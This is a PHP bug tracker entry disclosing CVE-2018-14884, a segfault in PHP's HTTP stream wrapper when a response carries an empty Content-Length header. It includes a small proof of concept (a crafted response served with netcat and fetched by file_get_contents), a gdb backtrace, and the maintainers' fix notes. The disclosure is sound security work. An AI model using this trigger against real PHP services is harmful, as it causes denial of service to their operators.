PHP :: Sec Bug #75535 :: Inappropriately parsing HTTP response leads to PHP segment fault!

Sec Bug #75535	Inappropriately parsing HTTP response leads to PHP segment fault!
Submitted:	2017-11-17 04:35 UTC	Modified:	2018-08-03 23:26 UTC
From:	orange at chroot dot org	Assigned:	nikic (profile)
Status:	Closed	Package:	HTTP related
PHP Version:	7.2Git-2017-11-17 (Git)	OS:	Ubuntu 17.04
Private report:	No	CVE-ID:	2018-14884

View Developer Edit

Welcome back! If you're the original bug submitter, here's where you can edit the bug or add additional notes.
If you forgot your password, you can retrieve your password here.

Password:

Status:
Package:
Bug Type:
Summary:
From:	orange at chroot dot org
New email:
PHP Version:		OS:

New Comment:

[2017-11-17 04:35 UTC] orange at chroot dot org

Description:
------------
I fuzzed the HTTP parsing function in the latest version of PHP and found a segment fault. It is very easy to trigger this segment fault and may be vulnerable in some scenarios.

In `ext/standard/http_fopen_wrapper.c#L801`

`http_header_value` can be a NULL value. so the `atoi(NULL)` will lead to segment fault!

https://github.com/php/php-src/blob/9fbb019848cbb0387cb7267489dd91ebb4d9050e/ext/standard/http_fopen_wrapper.c#L801

Test script:
---------------
# cat poc
HTTP/1.1 200 OK
Content-Length

# nc -vvlp 80 < poc &
# php -r 'file_get_contents("http://localhost/");'
Segmentation fault



gdb-peda$ bt
#0  __GI_____strtol_l_internal (nptr=0x0, endptr=0x0, base=0xa, group=<optimized out>, loc=0x7ffff72f0400 <_nl_global_locale>)
    at ../stdlib/strtol_l.c:293
#1  0x00005555558f284b in atoi (__nptr=0x0) at /usr/include/stdlib.h:241
#2  php_stream_url_wrap_http_ex (wrapper=0x55555633f6e0 <php_stream_http_wrapper>, path=<optimized out>, mode=<optimized out>,
    options=<optimized out>, opened_path=<optimized out>, context=<optimized out>, redirect_max=<optimized out>,
    flags=<optimized out>, response_header=<optimized out>) at /home/orange/php-src-master/ext/standard/http_fopen_wrapper.c:801
#3  0x00005555558f3a7d in php_stream_url_wrap_http (wrapper=<optimized out>, path=<optimized out>, mode=<optimized out>,
    options=<optimized out>, opened_path=<optimized out>, context=<optimized out>)
    at /home/orange/php-src-master/ext/standard/http_fopen_wrapper.c:978
#4  0x000055555592baf9 in _php_stream_open_wrapper_ex (path=0x7ffff42632b8 "http://localhost", mode=0x55555602b563 "rb",
    options=<optimized out>, opened_path=0x0, context=0x7ffff42014c0) at /home/orange/php-src-master/main/streams/streams.c:2025
#5  0x00005555558a6129 in zif_file_get_contents (execute_data=<optimized out>, return_value=0x7fffffffc820)
    at /home/orange/php-src-master/ext/standard/file.c:550
#6  0x000055555581965c in phar_file_get_contents (execute_data=0x7ffff421b090, return_value=0x7fffffffc820)
    at /home/orange/php-src-master/ext/phar/func_interceptors.c:224
#7  0x0000555555a2209c in ZEND_DO_ICALL_SPEC_RETVAL_UNUSED_HANDLER () at /home/orange/php-src-master/Zend/zend_vm_execute.h:573
#8  execute_ex (ex=0x0) at /home/orange/php-src-master/Zend/zend_vm_execute.h:60062
#9  0x0000555555a27345 in zend_execute (op_array=0x7ffff427b2a0, return_value=<optimized out>)
    at /home/orange/php-src-master/Zend/zend_vm_execute.h:64091
#10 0x0000555555968426 in zend_eval_stringl (str=0x555556389d50 "file_get_contents(\"http://localhost\");",
    str_len=<optimized out>, retval_ptr=0x0, string_name=<optimized out>)
    at /home/orange/php-src-master/Zend/zend_execute_API.c:1054
#11 0x00005555559684f9 in zend_eval_stringl_ex (str=<optimized out>, str_len=<optimized out>, retval_ptr=<optimized out>,
    string_name=<optimized out>, handle_exceptions=0x1) at /home/orange/php-src-master/Zend/zend_execute_API.c:1095
#12 0x0000555555a2945a in do_cli (argc=0x3, argv=0x555556389cc0) at /home/orange/php-src-master/sapi/cli/php_cli.c:1042
#13 0x00005555556556c2 in main ()
#14 0x00007ffff6f4e3f1 in __libc_start_main (main=0x555555655250 <main>, argc=0x3, argv=0x7fffffffdfe8, init=<optimized out>,
    fini=<optimized out>, rtld_fini=<optimized out>, stack_end=0x7fffffffdfd8) at ../csu/libc-start.c:291
#15 0x00005555556557da in _start ()



Actual result:
--------------
Segment fault

Patches

Pull Requests

History

AllCommentsChangesGit/SVN commitsRelated reports

[2017-11-18 11:34 UTC] nikic@php.net

-Status: Open +Status: Closed -Type: Bug +Type: Security -Assigned To: +Assigned To: nikic

[2017-11-18 11:34 UTC] nikic@php.net

Fixed by https://github.com/php/php-src/commit/0e097f2c96ce31b16fa371981045f224e5a37160.

The issue also exists in PHP 7.0 and 7.1, so I'm adding a security classification. Given control of the remote endpoint accessed by PHP, this provides a denial-of-service vector. As this is a null pointer dereference, it does not appear to be exploitable beyond DOS.

[2017-11-20 08:14 UTC] stas@php.net

If it's security-related, should be in 5.6 as well?

[2017-11-20 10:08 UTC] nikic@php.net

@stas: The issue has been introduced in https://github.com/php/php-src/commit/5146d9f8ac170d8ba7109370d732d56dc0777578, which landed in PHP 7.0.16, PHP 7.1.2 and PHP 7.2-dev. It does not affect PHP 5.6.

[2018-05-03 00:48 UTC] stas@php.net

-CVE-ID: +CVE-ID: needed

[2018-08-03 23:26 UTC] kaplan@php.net

-CVE-ID: needed +CVE-ID: 2018-14884

	php.net \| support \| documentation \| report a bug \| advanced search \| search howto \| statistics \| random bug \| login
go to bug id or search bugs for


Copyright © 2001-2025 The PHP Group All rights reserved.	Last updated: Mon Mar 31 07:01:29 2025 UTC